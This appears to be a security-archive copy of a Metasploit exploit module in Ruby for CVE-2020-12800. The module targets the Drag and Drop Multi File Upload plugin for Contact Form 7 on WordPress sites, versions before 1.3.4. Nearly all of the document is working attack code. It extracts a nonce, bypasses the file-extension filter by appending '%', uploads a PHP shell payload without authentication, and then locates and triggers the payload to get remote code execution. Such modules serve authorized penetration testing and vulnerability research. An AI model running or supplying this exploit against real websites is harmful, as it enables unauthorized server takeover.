WordPress Drag And Drop Multi File Uploader Remote Code Execution

This Metasploit module exploits a file upload feature of Drag and Drop Multi File Upload - Contact Form 7 for versions prior to 1.3.4. The allowed file extension list can be bypassed by appending a %, allowing for php shells to be uploaded. No authentication is required for exploitation.


MD5 | 8741d1320b67d5240a0da5c63f0f5065

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HTTP::Wordpress

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Wordpress Drag and Drop Multi File Uploader RCE',
'Description' => %q{
This module exploits a file upload feature of Drag and Drop Multi File
Upload - Contact Form 7 for versions prior to 1.3.4. The allowed file
extension list can be bypassed by appending a %, allowing for php
shells to be uploaded.
No authentication is required for exploitation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Austin Martin <[email protected]nsec.com>' # original PoC, discovery
],
'References' =>
[
['EDB', '48520'],
['CVE', '2020-12800'],
['URL', 'https://github.com/amartinsec/CVE-2020-12800']
],
'Platform' => ['php'],
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DisclosureDate' => 'May 11 2020',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of Wordpress', '/'])
]
)
end

# recursively search uploads folder(s) to find our payload
def find_payload(path, payload_name)
return unless @payload_location.nil?

path = normalize_uri(target_uri.path, path)
print_status("Checking #{path}")
res = send_request_cgi(
'uri' => path
)
unless res
vprint_error('Server didnt respond when attempting to trigger payload')
return
end
if res.body.include? payload_name
print_good("Found payload: #{path}#{payload_name}")
@payload_location = "#{path}#{payload_name}"
return
end

# /a href="([\w\-\/]+)"/.match(res.body) do |url|
res.body.scan(%r{a href="([\w\-/]+)"}) do |url|
if url[0].start_with? '/'
# skip it, its the parent directory
elsif url[0].end_with? '/'
find_payload("#{path}#{url[0]}", payload_name)
end
end
end

def check
begin
return check_plugin_version_from_readme('drag-and-drop-multiple-file-upload-contact-form-7', '1.3.4', '1')
rescue ::Rex::ConnectionError
vprint_error('Could not connect to the web service')
return CheckCode::Unknown
end
CheckCode::Safe
end

def exploit
vprint_status('Getting nonce')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path)
)
unless res
fail_with(Failure::Unreachable, 'No server response')
end

if res.code != 200
fail_with(Failure::UnexpectedReply, 'Non-200 response, check targeturi')
end

/ajax_nonce":"(?<nonce>.{10})"/ =~ res.body
if nonce.nil?
fail_with(Failure::UnexpectedReply, 'Nonce not found')
end
print_status("Nonce: #{nonce}")

payload_name = "#{rand_text_alphanumeric(6..12)}.php"

data = Rex::MIME::Message.new
data.add_part('5242880', nil, nil, 'form-data; name="size_limit"')
data.add_part('php%', nil, nil, 'form-data; name="supported_type"')
data.add_part('dnd_codedropz_upload', nil, nil, 'form-data; name="action"')
data.add_part('click', nil, nil, 'form-data; name="type"')
data.add_part(nonce, nil, nil, 'form-data; name="security"')
data.add_part(payload.encoded, 'text/plain', nil, "form-data; name='upload-file'; filename='#{payload_name}%'")

# grab our valid cookie
cookie = res.get_cookies

vprint_status('Attempting payload upload')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
'method' => 'POST',
'cookie' => cookie,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)

unless res
fail_with(Failure::Unreachable, 'No server response')
end

if res.code == 403
fail_with(Failure::UnexpectedReply, '403 response, nonce detection failed')
elsif res.code == 500
fail_with(Failure::UnexpectedReply, '500 response, server misconfigured, may need php-mbstring')
end
print_good('Payload uploaded successfully')
register_file_for_cleanup(payload_name)

# first we attempt to trigger the most obvious location of the payload.
print_status('Attempting to trigger at well known location')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wp_dndcf7_uploads', 'wpcf7-files', payload_name)
)

unless session_created?
fail_with(Failure::Unreachable, 'No server response') unless res

# dont need to check for 200, since that would have triggered our payload
if res.code != 200
print_status('Bruteforcing for payload to trigger')
find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name)
unless @payload_location
fail_with(Failure::Unknown, 'Unable to determine uploaded shell path')
end
# lastly, if we have a location found, trigger it
send_request_cgi('uri' => @payload_location)
end
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Could not connect to the web service')
end
end

Related Posts